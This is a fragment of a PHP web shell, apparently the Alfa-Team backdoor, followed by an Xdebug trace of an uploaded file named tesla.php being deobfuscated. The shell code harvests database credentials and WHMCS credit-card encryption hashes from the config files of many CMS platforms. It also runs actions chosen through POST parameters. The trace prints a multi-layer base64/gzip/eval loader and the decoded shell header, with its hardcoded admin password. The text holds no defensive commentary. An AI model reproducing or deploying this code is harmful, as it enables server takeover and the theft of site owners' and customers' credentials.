        $config = array('wp' => array('file' => '/wp-config.php', 'host' => array("/define[ ]{0,}\\([ ]{0,}(?:'|\")DB_HOST(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\\)[ ]{0,};/", 1), 'dbname' => array("/define[ ]{0,}\\([ ]{0,}(?:'|\")DB_NAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\\)[ ]{0,};/", 1), 'dbuser' => array("/define[ ]{0,}\\([ ]{0,}(?:'|\")DB_USER(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\\)[ ]{0,};/", 1), 'dbpw' => array("/define[ ]{0,}\\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\\)[ ]{0,};/", 1), 'prefix' => array("/table_prefix[ ]{0,}=[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 1)), 'drupal' => array('file' => '/config.php', 'host' => array("/define[ ]{0,}\\([ ]{0,}(?:'|\")DB_HOSTNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\\)[ ]{0,};/", 1), 'dbname' => array("/define[ ]{0,}\\([ ]{0,}(?:'|\")DB_DATABASE(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\\)[ ]{0,};/", 1), 'dbuser' => array("/define[ ]{0,}\\([ ]{0,}(?:'|\")DB_USERNAME(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\\)[ ]{0,};/", 1), 'dbpw' => array("/define[ ]{0,}\\([ ]{0,}(?:'|\")DB_PASSWORD(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\\)[ ]{0,};/", 1), 'prefix' => array("/define[ ]{0,}\\([ ]{0,}(?:'|\")DB_PREFIX(?:'|\")[ ]{0,},[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,}\\)[ ]{0,};/", 1)), 'drupal2' => array('file' => '/sites/default/settings.php', 'host' => array("/(?:'|\")host(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/", 1), 'dbname' => array("/(?:'|\")database(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/", 1), 'dbuser' => array("/(?:'|\")username(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/", 1), 'dbpw' => array("/(?:'|\")password(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/", 1), 'prefix' => array("/(?:'|\")prefix(?:'|\")[ ]{0,}=>[ ]{0,}(?:'|\")(.*?)(?:'|\")[ ]{0,},/", 1)), 'vb' => array('file' => '/includes/config.php', 'host' => array("/config\\[(?:'|\")MasterServer(?:'|\")\\]\\[(?:'|\")servername(?:'|\")\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 3), 'dbuser' => array("/config\\[(?:'|\")MasterServer(?:'|\")\\]\\[(?:'|\")username(?:'|\")\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 3), 'dbname' => array("/config\\[(?:'|\")Database(?:'|\")\\]\\[(?:'|\")dbname(?:'|\")\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 3), 'dbpw' => array("/config\\[(?:'|\")MasterServer(?:'|\")\\]\\[(?:'|\")password(?:'|\")\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 3), 'prefix' => array("/config\\[(?:'|\")Database(?:'|\")\\]\\[(?:'|\")tableprefix(?:'|\")\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/", 3)), 'phpnuke' => array('file' => '/config.php', 'host' => array('/dbhost(\\s+)=(\\s+)(?:\'|")(.*?)(?:\'|");/', 3), 'dbname' => array('/dbname(\\s+)=(\\s+)(?:\'|")(.*?)(?:\'|");/', 3), 'dbuser' => array('/dbuname(\\s+)=(\\s+)(?:\'|")(.*?)(?:\'|");/', 3), 'dbpw' => array('/dbpass(\\s+)=(\\s+)(?:\'|")(.*?)(?:\'|");/', 3), 'prefix' => array('/prefix(\\s+)=(\\s+)(?:\'|")(.*?)(?:\'|");/', 3)), 'smf' => array('file' => '/Settings.php', 'host' => array("/db_server(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbname' => array("/db_name(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbuser' => array("/db_user(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbpw' => array("/db_passwd(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'prefix' => array("/db_prefix(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3)), 'whmcs' => array('file' => '/configuration.php', 'host' => array("/db_host(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbname' => array("/db_name(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbuser' => array("/db_username(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbpw' => array("/db_password(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'cc_encryption_hash' => array("/cc_encryption_hash(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3)), 'joomla' => array('file' => '/configuration.php', 'host' => array("/\\\$host(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbname' => array("/\\\$db(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbuser' => array("/\\\$user(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbpw' => array("/\\\$password(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'prefix' => array("/\\\$dbprefix(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3)), 'phpbb' => array('file' => '/config.php', 'host' => array("/dbhost(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbname' => array("/dbname(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbuser' => array("/dbuser(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbpw' => array("/dbpasswd(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'prefix' => array("/table_prefix(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3)), 'mybb' => array('file' => '/inc/config.php', 'host' => array("/config\\['database'\\]\\['hostname'\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbname' => array("/config\\['database'\\]\\['database'\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbuser' => array("/config\\['database'\\]\\['username'\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbpw' => array("/config\\['database'\\]\\['password'\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'prefix' => array("/config\\['database'\\]\\['table_prefix'\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3)));
        if ($cms == "drupal") {
            $file = $config[$cms]['file'];
            $file = $path . $file;
            if (@is_file($file) || _alfa_is_dir($file, "-e")) {
            } else {
                $cms = 'drupal2';
            }
        }
        if ($cms == "vb") {
            $file = $config[$cms]['file'];
            $file = $path . $file;
            if (@is_file($file) || _alfa_is_dir($file, "-e")) {
            } else {
                $path .= '/core';
            }
        }
        $data = array();
        $srch_host = $config[$cms]['host'][0];
        $srch_user = $config[$cms]['dbuser'][0];
        $srch_name = $config[$cms]['dbname'][0];
        $srch_pw = $config[$cms]['dbpw'][0];
        $prefix = $config[$cms]['prefix'][0];
        $file = $config[$cms]['file'];
        $chost = $config[$cms]['host'][1];
        $cuser = $config[$cms]['dbuser'][1];
        $cname = $config[$cms]['dbname'][1];
        $cpw = $config[$cms]['dbpw'][1];
        $cprefix = $config[$cms]['prefix'][1];
        if (@is_dir($path) || _alfa_is_dir($path)) {
            $file = $path . $file;
        } elseif (@is_file($path) || _alfa_is_dir($path, "-e")) {
            $file = $path;
        } else {
            return false;
        }
        $file = __read_file($file);
        if ($cms == "drupal2") {
            $file = preg_replace("/\\@code(.*?)\\@endcode/s", "", $file);
        } elseif ($cms == "vb") {
            $file = preg_replace("/right of the(.*?)BAD!/s", "", $file);
        }
        if (preg_match($srch_host, $file, $mach)) {
            $data['host'] = $mach[$chost];
        }
        if (preg_match($srch_user, $file, $mach)) {
            $data['user'] = $mach[$cuser];
        }
        if (preg_match($srch_name, $file, $mach)) {
            $data['dbname'] = $mach[$cname];
        }
        if (preg_match($srch_pw, $file, $mach)) {
            $data['password'] = $mach[$cpw];
        }
        if (isset($prefix)) {
            if (preg_match($prefix, $file, $mach)) {
                $data['prefix'] = $mach[$cprefix];
            }
        }
        if ($cms == 'whmcs') {
            if (preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)) {
                $data['cc_encryption_hash'] = $mach[3];
            }
        }
        echo json_encode($data);
    }
    if (empty($_POST['a'])) {
        if (isset($default_action) && function_exists('alfa' . $default_action)) {
            $_POST['a'] = $default_action;
        } else {
            $_POST['a'] = 'FilesMan2';
        }
    }
    //'FilesMan';
    if (!empty($_POST['a']) && function_exists('alfa' . $_POST['a'])) {
        call_user_func('alfa' . $_POST['a']);
    }
    exit;
};
exit;

Execution traces

data/traces/f7235cbb1ff9c21220eb733912d41518_trace-1676255036.8519.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:24:22.749767]
1	0	1	0.000192	393512
1	3	0	0.001268	571096	{main}	1		/var/www/html/uploads/tesla.php	0	0
2	4	0	0.001288	571096	error_reporting	0		/var/www/html/uploads/tesla.php	2	1	0
2	4	1	0.001304	571136
2	4	R			22527
1		A						/var/www/html/uploads/tesla.php	3	$MEMEK_CYBER = 'urldecode'
1		A						/var/www/html/uploads/tesla.php	4	$JEMBUT_CYBER = 'base64_decode'
1		A						/var/www/html/uploads/tesla.php	5	$LONTE_CYBER = 'htmlspecialchars_decode'
1		A						/var/www/html/uploads/tesla.php	6	$MEMEK_CYNA = 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1\nbmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2Rl\nY29kZSUyOHN0cnJldiUyOCUyNE1FTUVLJTI5JTI5JTI5JTI5JTI5JTI5JTI5JTI5JTNC'
1		A						/var/www/html/uploads/tesla.php	9	$MEMEK = 'AUn29jnf/usLzzQ9/o4v9n762vH//9c8aAZkJtllUm+fKdqEIR2fK1ZFpxVHcnIW2VGdjOKZJMnXSx1xMr9ll0/3nwQp4//ntrf4//T8uDvXBsI7QGhxiHGRCzw9yE5VFeJAbV3YM14FazVuaR7S6TxgDDIl5aoXk7AEFwET9vIgkJAM1OojhvDgSc5JiAG4Sg3jnZA6UGHm5DcA4RL0KR7uSkb6J74nh0QBdR4g5IG3V6vCNG58xoFbKV7ADvehQvNRcy3I5VqASz75AAgeih4iuAVjdSNa01+WCDTVtRDPuXNvKAPk4ZQjGRDPtjaDCwLJaEAmQ34D6oyAD98XiJ0FpPcpeHi2x8RMO1rS2xeKoFTj6R8YfhBsbcG+ROKsFrgXYIPcGIoGqXQmx+cYOu8b72lp7pAX+iQ5F/zpAiQPWE/Pib5is2LMGaWvdZZ1JiRRjeYvHcdf/IgWg/616CgMiRHMza6JShN7IJEwHb0+WHnASM7y2Xhat0DUolnn'
2	5	0	0.001505	571096	base64_decode	0		/var/www/html/uploads/tesla.php	10	1	'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1\nbmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2Rl\nY29kZSUyOHN0cnJldiUyOCUyNE1FTUVLJTI5JTI5JTI5JTI5JTI5JTI5JTI5JTI5JTNC'
2	5	1	0.001527	571384
2	5	R			'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24MEMEK%29%29%29%29%29%29%29%29%3B'
2	6	0	0.001549	571352	urldecode	0		/var/www/html/uploads/tesla.php	10	1	'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24MEMEK%29%29%29%29%29%29%29%29%3B'
2	6	1	0.001568	571576
2	6	R			'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($MEMEK))))))));'
2	7	0	0.001587	571288	htmlspecialchars_decode	0		/var/www/html/uploads/tesla.php	10	1	'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($MEMEK))))))));'
2	7	1	0.001606	571512
2	7	R			'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($MEMEK))))))));'
2	8	0	0.001638	573632	eval	1	'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($MEMEK))))))));'	/var/www/html/uploads/tesla.php	10	0
3	9	0	0.001655	573632	strrev	0		/var/www/html/uploads/tesla.php(10) : eval()'d code	1	1	'AUn29jnf/usLzzQ9/o4v9n762vH//9c8aAZkJtllUm+fKdqEIR2fK1ZFpxVHcnIW2VGdjOKZJMnXSx1xMr9ll0/3nwQp4//ntrf4//T8uDvXBsI7QGhxiHGRCzw9yE5VFeJAbV3YM14FazVuaR7S6TxgDDIl5aoXk7AEFwET9vIgkJAM1OojhvDgSc5JiAG4Sg3jnZA6UGHm5DcA4RL0KR7uSkb6J74nh0QBdR4g5IG3V6vCNG58xoFbKV7ADvehQvNRcy3I5VqASz75AAgeih4iuAVjdSNa01+WCDTVtRDPuXNvKAPk4ZQjGRDPtjaDCwLJaEAmQ34D6oyAD98XiJ0FpPcpeHi2x8RMO1rS2xeKoFTj6R8YfhBsbcG+ROKsFrgXYIPcGIoGqXQmx+cYOu8b72lp7pAX+iQ5F/zpAiQPWE/Pib5is2LMGaWvdZZ1JiRRjeYvHcdf/IgWg/616CgMiRHMza6JShN7IJEwHb0+WHnASM7y2Xhat0DUolnn'
3	9	1	0.001836	749792
3	9	R			'ACuA1H8AKoDVfwAlgNp/eJwAJYDaf3ic7L1pe+JKkij8ufp5+j+odNwlaGN274VdXvBW3srGu30ZgQTIBkRJwng5nt/+RkRmSikhMK5TZ2bufae6j4FcIyMjIyMiIyO/rvZavX/+wzVd17K7VdfTHS+RXP7nP0zHsZ2qY/Zsx7O6zUQWE7+5plf1rI5ZbVsdy+OJ9bapO1DTq+v1lkm1v1ldqwqFExprp203tdTh2f5+OBOSq1TA1VLZcFZHf6qaT2a97yFc2OdQEbvv9fpetdZvNEwHYBwqYFhur60/+10olJ/59z//8Wmt77VsZ0n5dGq3zUfLtWptM7PWbugzFVPvQIGK2Tabjt6BIi3P67lLmYzHk9IdM+MG1aDwld2v9GumVPYZgIOUdN3uRMpud3SrvfTpk5T6rYlpWBbyN3XPhOwDu2vozynl1Ox5ZqdmOkqumFLy2Xz2n//4d+af/5ja3j9aX9s/vdHs6+bhc88+PjnT7pSSojuO/pz45z8U'
3	10	0	0.001969	749760	base64_decode	0		/var/www/html/uploads/tesla.php(10) : eval()'d code	1	1	'ACuA1H8AKoDVfwAlgNp/eJwAJYDaf3ic7L1pe+JKkij8ufp5+j+odNwlaGN274VdXvBW3srGu30ZgQTIBkRJwng5nt/+RkRmSikhMK5TZ2bufae6j4FcIyMjIyMiIyO/rvZavX/+wzVd17K7VdfTHS+RXP7nP0zHsZ2qY/Zsx7O6zUQWE7+5plf1rI5ZbVsdy+OJ9bapO1DTq+v1lkm1v1ldqwqFExprp203tdTh2f5+OBOSq1TA1VLZcFZHf6qaT2a97yFc2OdQEbvv9fpetdZvNEwHYBwqYFhur60/+10olJ/59z//8Wmt77VsZ0n5dGq3zUfLtWptM7PWbugzFVPvQIGK2Tabjt6BIi3P67lLmYzHk9IdM+MG1aDwld2v9GumVPYZgIOUdN3uRMpud3SrvfTpk5T6rYlpWBbyN3XPhOwDu2vozynl1Ox5ZqdmOkqumFLy2Xz2n//4d+af/5ja3j9aX9s/vdHs6+bhc88+PjnT7pSSojuO/pz45z8U'
3	10	1	0.002676	925920
3	10	R			'\000+��\000*��\000%��x�\000%��x��i{�J�(���y�?�t�%hcv�]^�V��ƻ}\031�\004�\006DI�x9��FDfJ)!0�Sgf�}����\\#####"##���Z���5]ײ�U��\035/�\\��?LDZ��c�ldz��D\026\023���W���Ym[\035����;Pӫ�I��Y]�\n�\023\032k�m7����~8\023��T��R�pVG��Of��!\\��P\021��^��o4L\a`\034*`Xn��?�](����?��i��lgI�tj��G˵jm3��n�3\025S�@���6��ށ"-��K��Ǔ�\0353�\006ՠ�ݯ�k�T�\031���t��D�nwt���铔���iX\026�7uτ�\003�k��)���yf�f:J��R��|����w����?Z_�?������s�>>9��;�����?\024���]���;���h�ѱ�Z��t�\035؎��\026�b�l,�s��Ys^�.,\02'
3	11	0	0.005065	749760	gzinflate	0		/var/www/html/uploads/tesla.php(10) : eval()'d code	1	1	'\000+��\000*��\000%��x�\000%��x��i{�J�(���y�?�t�%hcv�]^�V��ƻ}\031�\004�\006DI�x9��FDfJ)!0�Sgf�}����\\#####"##���Z���5]ײ�U��\035/�\\��?LDZ��c�ldz��D\026\023���W���Ym[\035����;Pӫ�I��Y]�\n�\023\032k�m7����~8\023��T��R�pVG��Of��!\\��P\021��^��o4L\a`\034*`Xn��?�](����?��i��lgI�tj��G˵jm3��n�3\025S�@���6��ށ"-��K��Ǔ�\0353�\006ՠ�ݯ�k�T�\031���t��D�nwt���铔���iX\026�7uτ�\003�k��)���yf�f:J��R��|����w����?Z_�?������s�>>9��;�����?\024���]���;���h�ѱ�Z��t�\035؎��\026�b�l,�s��Ys^�.,\02'
3	11	1	0.007883	884960
3	11	R			'\000*��\000%��x�\000%��x��i{�J�(���y�?�t�%hcv�]^�V��ƻ}\031�\004�\006DI�x9��FDfJ)!0�Sgf�}����\\#####"##���Z���5]ײ�U��\035/�\\��?LDZ��c�ldz��D\026\023���W���Ym[\035����;Pӫ�I��Y]�\n�\023\032k�m7����~8\023��T��R�pVG��Of��!\\��P\021��^��o4L\a`\034*`Xn��?�](����?��i��lgI�tj��G˵jm3��n�3\025S�@���6��ށ"-��K��Ǔ�\0353�\006ՠ�ݯ�k�T�\031���t��D�nwt���铔���iX\026�7uτ�\003�k��)���yf�f:J��R��|����w����?Z_�?������s�>>9��;�����?\024���]���;���h�ѱ�Z��t�\035؎��\026�b�l,�s��Ys^�.,\026닋��l�'
3	12	0	0.010891	708800	gzinflate	0		/var/www/html/uploads/tesla.php(10) : eval()'d code	1	1	'\000*��\000%��x�\000%��x��i{�J�(���y�?�t�%hcv�]^�V��ƻ}\031�\004�\006DI�x9��FDfJ)!0�Sgf�}����\\#####"##���Z���5]ײ�U��\035/�\\��?LDZ��c�ldz��D\026\023���W���Ym[\035����;Pӫ�I��Y]�\n�\023\032k�m7����~8\023��T��R�pVG��Of��!\\��P\021��^��o4L\a`\034*`Xn��?�](����?��i��lgI�tj��G˵jm3��n�3\025S�@���6��ށ"-��K��Ǔ�\0353�\006ՠ�ݯ�k�T�\031���t��D�nwt���铔���iX\026�7uτ�\003�k��)���yf�f:J��R��|����w����?Z_�?������s�>>9��;�����?\024���]���;���h�ѱ�Z��t�\035؎��\026�b�l,�s��Ys^�.,\026닋��l�'
3	12	1	0.013331	844000
3	12	R			'\000%��x�\000%��x��i{�J�(���y�?�t�%hcv�]^�V��ƻ}\031�\004�\006DI�x9��FDfJ)!0�Sgf�}����\\#####"##���Z���5]ײ�U��\035/�\\��?LDZ��c�ldz��D\026\023���W���Ym[\035����;Pӫ�I��Y]�\n�\023\032k�m7����~8\023��T��R�pVG��Of��!\\��P\021��^��o4L\a`\034*`Xn��?�](����?��i��lgI�tj��G˵jm3��n�3\025S�@���6��ށ"-��K��Ǔ�\0353�\006ՠ�ݯ�k�T�\031���t��D�nwt���铔���iX\026�7uτ�\003�k��)���yf�f:J��R��|����w����?Z_�?������s�>>9��;�����?\024���]���;���h�ѱ�Z��t�\035؎��\026�b�l,�s��Ys^�.,\026닋��l�1;k�T&�'
3	13	0	0.015829	708800	gzinflate	0		/var/www/html/uploads/tesla.php(10) : eval()'d code	1	1	'\000%��x�\000%��x��i{�J�(���y�?�t�%hcv�]^�V��ƻ}\031�\004�\006DI�x9��FDfJ)!0�Sgf�}����\\#####"##���Z���5]ײ�U��\035/�\\��?LDZ��c�ldz��D\026\023���W���Ym[\035����;Pӫ�I��Y]�\n�\023\032k�m7����~8\023��T��R�pVG��Of��!\\��P\021��^��o4L\a`\034*`Xn��?�](����?��i��lgI�tj��G˵jm3��n�3\025S�@���6��ށ"-��K��Ǔ�\0353�\006ՠ�ݯ�k�T�\031���t��D�nwt���铔���iX\026�7uτ�\003�k��)���yf�f:J��R��|����w����?Z_�?������s�>>9��;�����?\024���]���;���h�ѱ�Z��t�\035؎��\026�b�l,�s��Ys^�.,\026닋��l�1;k�T&�'
3	13	1	0.018715	844000
3	13	R			'x�\000%��x��i{�J�(���y�?�t�%hcv�]^�V��ƻ}\031�\004�\006DI�x9��FDfJ)!0�Sgf�}����\\#####"##���Z���5]ײ�U��\035/�\\��?LDZ��c�ldz��D\026\023���W���Ym[\035����;Pӫ�I��Y]�\n�\023\032k�m7����~8\023��T��R�pVG��Of��!\\��P\021��^��o4L\a`\034*`Xn��?�](����?��i��lgI�tj��G˵jm3��n�3\025S�@���6��ށ"-��K��Ǔ�\0353�\006ՠ�ݯ�k�T�\031���t��D�nwt���铔���iX\026�7uτ�\003�k��)���yf�f:J��R��|����w����?Z_�?������s�>>9��;�����?\024���]���;���h�ѱ�Z��t�\035؎��\026�b�l,�s��Ys^�.,\026닋��l�1;k�T&�1f\023f�'
3	14	0	0.021656	708800	gzuncompress	0		/var/www/html/uploads/tesla.php(10) : eval()'d code	1	1	'x�\000%��x��i{�J�(���y�?�t�%hcv�]^�V��ƻ}\031�\004�\006DI�x9��FDfJ)!0�Sgf�}����\\#####"##���Z���5]ײ�U��\035/�\\��?LDZ��c�ldz��D\026\023���W���Ym[\035����;Pӫ�I��Y]�\n�\023\032k�m7����~8\023��T��R�pVG��Of��!\\��P\021��^��o4L\a`\034*`Xn��?�](����?��i��lgI�tj��G˵jm3��n�3\025S�@���6��ށ"-��K��Ǔ�\0353�\006ՠ�ݯ�k�T�\031���t��D�nwt���铔���iX\026�7uτ�\003�k��)���yf�f:J��R��|����w����?Z_�?������s�>>9��;�����?\024���]���;���h�ѱ�Z��t�\035؎��\026�b�l,�s��Ys^�.,\026닋��l�1;k�T&�1f\023f�'
3	14	1	0.024306	844000
3	14	R			'x��i{�J�(���y�?�t�%hcv�]^�V��ƻ}\031�\004�\006DI�x9��FDfJ)!0�Sgf�}����\\#####"##���Z���5]ײ�U��\035/�\\��?LDZ��c�ldz��D\026\023���W���Ym[\035����;Pӫ�I��Y]�\n�\023\032k�m7����~8\023��T��R�pVG��Of��!\\��P\021��^��o4L\a`\034*`Xn��?�](����?��i��lgI�tj��G˵jm3��n�3\025S�@���6��ށ"-��K��Ǔ�\0353�\006ՠ�ݯ�k�T�\031���t��D�nwt���铔���iX\026�7uτ�\003�k��)���yf�f:J��R��|����w����?Z_�?������s�>>9��;�����?\024���]���;���h�ѱ�Z��t�\035؎��\026�b�l,�s��Ys^�.,\026닋��l�1;k�T&�1f\023f�ջIބ�7�j�'
3	15	0	0.026793	708800	gzuncompress	0		/var/www/html/uploads/tesla.php(10) : eval()'d code	1	1	'x��i{�J�(���y�?�t�%hcv�]^�V��ƻ}\031�\004�\006DI�x9��FDfJ)!0�Sgf�}����\\#####"##���Z���5]ײ�U��\035/�\\��?LDZ��c�ldz��D\026\023���W���Ym[\035����;Pӫ�I��Y]�\n�\023\032k�m7����~8\023��T��R�pVG��Of��!\\��P\021��^��o4L\a`\034*`Xn��?�](����?��i��lgI�tj��G˵jm3��n�3\025S�@���6��ށ"-��K��Ǔ�\0353�\006ՠ�ݯ�k�T�\031���t��D�nwt���铔���iX\026�7uτ�\003�k��)���yf�f:J��R��|����w����?Z_�?������s�>>9��;�����?\024���]���;���h�ѱ�Z��t�\035؎��\026�b�l,�s��Ys^�.,\026닋��l�1;k�T&�1f\023f�ջIބ�7�j�'
3	15	1	0.031529	1175776
3	15	R			'<?php\r\nsession_start();\r\nerror_reporting(0);\r\n@set_time_limit(0);\r\n@clearstatcache();\r\n@ini_set(\'error_log\',NULL);\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'max_execution_time\',0);\r\n@ini_set(\'output_buffering\',0);\r\n@ini_set(\'display_errors\', 0);\r\n/*\r\n\tAuthor: \tSolevisible/Alfa-Team\r\n\tTelegram: \thttps://telegram.me/solevisible\r\n\tYouTube: \thttps://youtube.com/solevisible\r\n\tGmail:\t\tsolevisible@gmail.com\r\n\tDate:\t\tMonday, September 14, 2020\r\n*/\r\n$GLOBALS[\'oZgN'
3	16	0	0.044958	3419768	eval	1	'?><?php\r\nsession_start();\r\nerror_reporting(0);\r\n@set_time_limit(0);\r\n@clearstatcache();\r\n@ini_set(\'error_log\',NULL);\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'max_execution_time\',0);\r\n@ini_set(\'output_buffering\',0);\r\n@ini_set(\'display_errors\', 0);\r\n/*\r\n\tAuthor: \tSolevisible/Alfa-Team\r\n\tTelegram: \thttps://telegram.me/solevisible\r\n\tYouTube: \thttps://youtube.com/solevisible\r\n\tGmail:\t\tsolevisible@gmail.com\r\n\tDate:\t\tMonday, September 14, 2020\r\n*/\r\n$GLOBALS[\'oZgNypoPRU\'] = array(\r\n    \'username\' => \'admin\',\r\n    \'password\' => \'8d44ef8a56b85e7a0894c99fc50f55e2\',//md5(ehsan)\r\n    \'safe_mode\' => \'1\',\r\n    \'login_page\' => \'500\',\r\n    \'show_icons\' => \'1\',\r\n    \'post_encryption\' => false,\r\n    \'cgi_api\' => true,\r\n);\r\n\r\n$CWppUDJxuf = \'fu\' . \'n\' . \'ct\' . \'ion_\' . \'e\' . \'xist\' . \'s\';\r\n$aztJtafUXm = \'cha\' . \'r\' . \'C\' . \'o\' . \'d\' . \'e\' . \'A\' . \'t\' . \'\';\r\n$OVpGNqqFZs = \'e\' . \'v\' . \'al\';\r\n$psDEwGhsxg = \'gz\' . \'inf\' . \'late\';\r\n\r\nif (!$CWppUDJxuf(\'b\' . \'a\' . \'se64\' . \'_en\' . \'c\' . \'ode\' . \'\'))\r\n{\r\n    function vcnvSCZgBz($data)\r\n    {\r\n        if (empty($data)) return;\r\n        $b64 = \'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\';\r\n        $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;\r\n        $ac = 0;\r\n        $enc = \'\';\r\n        $tmp_arr = array();\r\n        if (!$data)\r\n        {\r\n            return $data;\r\n        }\r\n        do\r\n        {\r\n            $o1 = $aztJtafUXm($data, $i++);\r\n            $o2 = $aztJtafUXm($data, $i++);\r\n            $o3 = $aztJtafUXm($data, $i++);\r\n            $bits = $o1 << 16 | $o2 << 8 | $o3;\r\n            $h1 = $bits >> 18 & 0x3f;\r\n            $h2 = $bits >> 12 & 0x3f;\r\n            $h3 = $bits >> 6 & 0x3f;\r\n            $h4 = $bits & 0x3f;\r\n            $tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4);\r\n        }\r\n        while ($i < strlen($data));\r\n        $enc = implode($tmp_arr, \'\');\r\n        $r = (strlen($data) % 3);\r\n        return ($r ? substr($enc, 0, ($r - 3)) : $enc) . substr(\'===\', ($r || 3));\r\n    }\r\n    function charCodeAt($data, $char)\r\n    {\r\n        return ord(substr($data, $char, 1));\r\n    }\r\n    function charAt($data, $char)\r\n    {\r\n        return substr($data, $char, 1);\r\n    }\r\n}\r\nelse\r\n{\r\n    function vcnvSCZgBz($s)\r\n    {\r\n        $b = \'b\' . \'a\' . \'se64\' . \'_en\' . \'c\' . \'ode\' . \'\';\r\n        return $b($s);\r\n    }\r\n}\r\nif (!$CWppUDJxuf(\'b\' . \'a\' . \'se\' . \'6\' . \'4\' . \'_d\' . \'ecod\' . \'e\' . \'\'))\r\n{\r\n    function zRtSHsbTzV($input)\r\n    {\r\n        if (empty($input)) return;\r\n        $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";\r\n        $chr1 = $chr2 = $chr3 = "";\r\n        $enc1 = $enc2 = $enc3 = $enc4 = "";\r\n        $i = 0;\r\n        $output = "";\r\n        $input = preg_replace("[^A-Za-z0-9\\+\\/\\=]", "", $input);\r\n        do\r\n        {\r\n            $enc1 = strpos($keyStr, substr($input, $i++, 1));\r\n            $enc2 = strpos($keyStr, substr($input, 